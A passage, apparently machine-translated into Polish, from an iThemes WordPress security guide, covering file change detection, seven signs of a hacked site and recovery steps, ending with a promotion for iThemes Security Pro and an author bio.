2. Porównanie plików dla wtyczek i motywów iThemes

Zaznacz pole Porównaj pliki online w ustawieniach wykrywania zmian plików, aby włączyć porównywanie plików online.

Za każdym razem, gdy plik w Twojej witrynie należący do wtyczki lub motywu iThemes zostanie zmieniony, zostanie porównany z plikiem na serwerze iThemes. Jeśli skrót do wersji pliku w Twojej witrynie pasuje do skrótu do wersji na serwerze iThemes, będzie to prawidłowa zmiana i nie otrzymasz alertu.

3. Porównanie plików online WordPress.org

Jeśli plik główny WordPressa lub wtyczka zainstalowana z repozytorium WordPress.org zostanie zmieniona, plik zostanie porównany z wersją na WordPress.org. Jeśli skróty są zgodne, zmiany nie są złośliwe i nie otrzymasz alertu.

4. Wyłączenia ręczne

Możesz wykluczyć pliki, katalogi i typy plików z File Change Detection w ustawieniach File Change Detection.

Ogólna zasada jest taka, że ​​można wykluczyć pliki, o których wiesz, że będą regularnie aktualizowane. Doskonałym tego przykładem są pliki kopii zapasowych i pamięci podręcznej. Wykluczenie tego typu plików uspokoi wiele dodatkowego szumu.

7 oznak, że Twoja witryna WordPress została zhakowana

Zadajesz sobie pytanie: „ Czy moja witryna WordPress została zhakowana? ” oznacza, że ​​będziesz potrzebować szybkich odpowiedzi.

Im szybciej zauważysz oznaki naruszenia bezpieczeństwa witryny, tym szybciej możesz ją wyczyścić. Im szybciej wyczyścisz witrynę, tym mniej szkód może wyrządzić w niej haker.

1. Twoja strona główna jest inna

Zmiany na Twojej stronie głównej wydają się oczywistym znakiem. Ale ile razy faktycznie sprawdzasz swoją stronę główną? Wiem, że zazwyczaj przechodzę bezpośrednio do adresu URL logowania, a nie adresu domowego. Stamtąd loguję się, aktualizuję witrynę lub edytuję post. Po skończeniu tego, po co przyszedłem, często wychodzę bez patrzenia na stronę główną mojej witryny.

Głównym celem niektórych hacków jest trollowanie strony internetowej lub zdobycie rozgłosu. Zmieniają więc tylko twoją stronę główną na coś, co uważają za zabawne lub zostawiają zhakowaną kartę telefoniczną.

Jeśli zauważysz zmianę na swojej stronie głównej, możesz szybko i łatwo przywrócić swoją witrynę, korzystając z pliku kopii zapasowej utworzonego za pomocą zaufanej wtyczki do tworzenia kopii zapasowych WordPress, takiej jak BackupBuddy.

2. Wydajność Twojej witryny spadła

Twoja witryna może być spowolniona, gdy ma infekcję. W przypadku ataków typu brute force lub złośliwego skryptu wykorzystującego zasoby serwera do wydobywania kryptowaluty w witrynie mogą wystąpić spowolnienia. Podobnie atak DDoS (lub atak typu „odmowa usługi” ) ma miejsce, gdy sieć adresów IP jednocześnie wysyła żądania do Twojej witryny, próbując spowodować jej awarię.

3. Twoja witryna zawiera złośliwe lub spamowe reklamy wyskakujące

Istnieje duża szansa, że ​​haker zhakował Twoją witrynę, jeśli odwiedzający zobaczą wyskakujące okienka, które przekierowują ich do złośliwej witryny. Celem tego typu ataku jest skierowanie ruchu z Twojej witryny do witryny atakującego, aby mogli oni atakować użytkowników za pomocą fałszywych kliknięć w reklamach Pay Per Click.

Najbardziej frustrującą rzeczą w tego typu hackowaniu jest to, że możesz nie widzieć wyskakujących okienek. Hack wyskakujący może być zaprojektowany tak, aby nie wyświetlał się dla zalogowanych użytkowników, co zmniejsza prawdopodobieństwo zobaczenia ich przez właścicieli witryn. Więc nawet gdy właściciel witryny się wyloguje, wyskakujące okienka nigdy się nie wyświetlą.

Twój widok wyskakujących okienek może być również ograniczony, jeśli używasz rozszerzenia blokującego reklamy w swojej przeglądarce. Na przykład klient zgłosił włamanie do wyskakującego okienka i udostępnił zrzuty ekranu oraz wideo z wyskakującymi okienkami. Po spędzeniu godzin na ich stronie internetowej nie byłem w stanie odtworzyć niczego, co zgłaszali. Byłem przekonany, że włamano się na ich komputer osobisty, a nie na stronę internetową.

W końcu dotarło do mnie, dlaczego nie mogłem zobaczyć wyskakujących okienek. Zainstalowałem rozszerzenie adblocker w mojej przeglądarce. Gdy tylko wyłączyłem rozszerzenie blokowania reklam, wszędzie mogłem zobaczyć wyskakujące okienka. Mam nadzieję, że podzielę się tą żenującą historią, aby uchronić cię przed popełnieniem tego samego błędu.

4. Zauważasz spadek ruchu w witrynie

Jeśli zalogujesz się na swoje konto Google Analytics i zauważysz gwałtowny spadek ruchu w witrynie, Twoja witryna WordPress może zostać zhakowana. Spadek ruchu w witrynie wymaga zbadania. W Twojej witrynie może znajdować się złośliwy skrypt, który przekierowuje odwiedzających z Twojej witryny, lub Google może już umieścić Twoją witrynę na czarnej liście jako złośliwą witrynę.

Pierwszą rzeczą, której chcesz szukać, jest ruch wychodzący z Twojej witryny. Śledząc swoją witrynę za pomocą Google Analytics, musisz skonfigurować witrynę do śledzenia ruchu opuszczającego witrynę. Najłatwiejszym sposobem monitorowania ruchu wychodzącego w witrynie WordPress jest użycie wtyczki WordPress Google Analytics.

6. Nieoczekiwani nowi użytkownicy

Jeśli Twoja witryna ma nieoczekiwane rejestracje nowych administratorów, to kolejny znak, że Twoja witryna WordPress została zhakowana. Za pomocą exploita zaatakowanego użytkownika osoba atakująca może utworzyć nowego administratora. Dzięki nowym uprawnieniom administratora haker jest gotowy do spowodowania poważnych szkód w Twojej witrynie.

Pamiętasz wcześniejszą wtyczkę WP GDPR Compliance? W listopadzie 2018 r. mieliśmy kilka raportów o tworzeniu nowych administratorów na stronach klientów. Hakerzy wykorzystali lukę we wtyczce WP GDPR Compliance (luka załatana w wersji 1.4.3), aby utworzyć nowych administratorów w witrynach WordPress z wtyczką. Exploit wtyczki umożliwiał nieautoryzowanym użytkownikom modyfikację rejestracji użytkownika w celu zmiany domyślnej roli nowego użytkownika z subskrybenta na administratora. Niestety nie była to jedyna luka w zabezpieczeniach i nie można po prostu usunąć nowych użytkowników stworzonych przez atakującego i załatać wtyczkę.

Jeśli masz zainstalowane WP GDPR Compliance i WooCommerce, Twoja witryna mogła zostać wstrzyknięta złośliwym kodem. Osoby atakujące mogą użyć instalatora działającego w tle wtyczki WooCommerce, aby wstawić do bazy danych instalatora backdoora. Jeśli w Twojej witrynie zainstalowano backdoora, skontaktuj się ze specjalistą ds. naprawy hakerów. Inną opcją jest użycie pliku kopii zapasowej, aby przywrócić kopię witryny przed naruszeniem przy użyciu poprzedniej kopii zapasowej.

7. Usunięci administratorzy

Jeśli nie możesz zalogować się do witryny WordPress, nawet po zresetowaniu hasła, może to być poważna oznaka infekcji.

Kiedy repozytorium Gentoo Github zostało zhakowane, pierwszą rzeczą, jaką zrobił atakujący, było usunięcie wszystkich użytkowników admin. Jak więc ten haker dostał się na ich konto Github? Hasło administratora Gentoo zostało odkryte na innej stronie. Zgaduję, że nazwa użytkownika i hasło zostały odkryte przez skrobanie lub zrzut bazy danych.

Mimo że hasło administratora do jego konta Gentoo Github różniło się od hasła używanego na zaatakowanym koncie, było bardzo podobne. To tak, jakbym używał iAmAwesome2020 jako hasła na jednym koncie i iAmAwesome2021 na innej stronie. Tak więc hakerzy byli w stanie rozgryźć hasło przy niewielkim wysiłku. Jak widzimy, do każdego konta należy używać unikalnego hasła. Prosta zmiana haseł nie wystarczy. Korzystając z LastPass, możesz generować i bezpiecznie przechowywać silne, unikalne hasła dla każdej witryny.

Jak wrócić z katastrofy

Jeśli podejrzewasz, że doszło do naruszenia, możesz podjąć kilka szybkich kroków, aby złagodzić szkody.

Przywróć poprzednią/czystą kopię zapasową swojej witryny

Najpewniejszym sposobem cofnięcia naruszenia bezpieczeństwa jest przywrócenie witryny do poprzedniej wersji sprzed ataku. Dlatego tak ważne jest posiadanie kompleksowego rozwiązania do tworzenia kopii zapasowych WordPress. Zalecamy używanie BackupBuddy do planowania automatycznego uruchamiania kopii zapasowych, dzięki czemu zawsze masz kopię zapasową.

Pamiętaj tylko, że przywrócenie poprzedniej kopii zapasowej może nadal narażać Twoją witrynę na to samo naruszenie, dlatego ważne jest, aby wykonać również te kroki.

Natychmiast zaktualizuj wszystkie nieaktualne wtyczki i motywy

Podatna wtyczka lub motyw może nadal być winowajcą, dlatego ważne jest, aby NATYCHMIAST zaktualizować wszystkie nieaktualne wtyczki lub motywy. Nawet jeśli przywrócisz poprzednią czystą wersję swojej witryny, te same luki nadal będą istnieć i mogą zostać ponownie zhakowane.

Możesz również sprawdzić, czy nie korzystasz z podatnej wtyczki lub motywu, który wciąż nie ma poprawki od dewelopera. Musisz natychmiast usunąć tę wtyczkę.

Włącz uwierzytelnianie dwuskładnikowe

Jeśli nie używasz uwierzytelniania dwuskładnikowego do zabezpieczania loginów administratora, natychmiast je aktywuj. Ta dodatkowa warstwa zabezpieczeń pomoże zapewnić, że nieupoważnieni użytkownicy nie będą mogli włamać się do żadnych kont administratorów.

Poszukaj pomocy w profesjonalnym usuwaniu złośliwego oprogramowania

Naruszenia bezpieczeństwa WordPress występują na poziomie serwera (głębszym niż instalacja WordPressa), więc może być konieczne skontaktowanie się z profesjonalną usługą usuwania złośliwego oprogramowania. Zalecamy WeWatchYourWebsite do profesjonalnego usuwania złośliwego oprogramowania.

Podsumowanie: WordPress Security Ultimate Guide

W tym przewodniku bezpieczeństwa WordPress omówiliśmy DUŻO! Jednak postępując zgodnie ze wskazówkami zawartymi w tym przewodniku, zablokujesz prawie 100% ataków na Twoją witrynę.

Wtyczka zabezpieczająca WordPress może pomóc zabezpieczyć Twoją witrynę WordPress

W połączeniu ze znajomością tematów dotyczących bezpieczeństwa WordPress w tym przewodniku, wtyczka bezpieczeństwa WordPress może pomóc zabezpieczyć Twoją witrynę WordPress. iThemes Security Pro, nasza wtyczka bezpieczeństwa WordPress, oferuje ponad 50 sposobów zabezpieczenia i ochrony Twojej witryny przed typowymi lukami w zabezpieczeniach WordPress. Dzięki WordPress, uwierzytelnianiu dwuskładnikowemu, ochronie przed brutalną siłą, silnemu egzekwowaniu haseł i nie tylko, możesz dodać dodatkową warstwę bezpieczeństwa do swojej witryny.

Michael Moore

Co tydzień Michael opracowuje raport na temat luk w zabezpieczeniach WordPressa, aby pomóc chronić Twoje witryny. Jako Product Manager w iThemes pomaga nam w dalszym ulepszaniu linii produktów iThemes. Jest wielkim kujonem i uwielbia uczyć się wszystkich rzeczy technicznych, starych i nowych. Możesz znaleźć Michaela spędzającego czas z żoną i córką, czytającego lub słuchającego muzyki, gdy nie pracuje.